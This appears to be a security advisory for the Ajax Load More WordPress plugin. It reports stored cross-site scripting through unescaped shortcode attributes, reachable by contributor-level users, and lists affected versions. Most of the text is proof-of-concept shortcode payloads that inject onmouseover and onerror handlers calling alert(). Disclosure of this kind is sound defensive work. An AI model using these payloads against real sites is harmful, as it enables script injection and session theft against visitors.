The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.
Examples (a lot of attributes are affected!, not just the ones below) v < 5.6.0.3 [ajax_load_more id=‘" onmouseover=“alert(/XSS-id-1/)”’] [ajax_load_more id=‘2" src onerror=alert(/XSSid-2/)//’] [ajax_load_more id=‘a = 1;alert(/XSSid-3/); var b’] [ajax_load_more button_label=‘"onmouseover=alert(/XSS-button_label/)//’] [ajax_load_more button_loading_label=‘"onmouseover=alert(/XSS-button_loading_label/)//’] [ajax_load_more button_done_label=‘"onmouseover=alert(/XSS-button_done_label/)//’] v < 5.6.0.1 [ajax_load_more max_pages=‘"onmouseover=alert(/XSS-max_pages/)//’] v < 5.6.0 [ajax_load_more repeater=‘" onmouseover=“alert(/XSS/)”’] [ajax_load_more theme_repeater=‘" onmouseover=“alert(/XSS/)”’] [ajax_load_more tag=‘" onmouseover=“alert(/XSS/)”’] v < 5.5.5 (original from submitter) [ajax_load_more css_classes=‘" onmouseover=“alert(/XSS/)”’]
CPE | Name | Operator | Version |
---|---|---|---|
ajax-load-more | lt | 5.6.0.3 |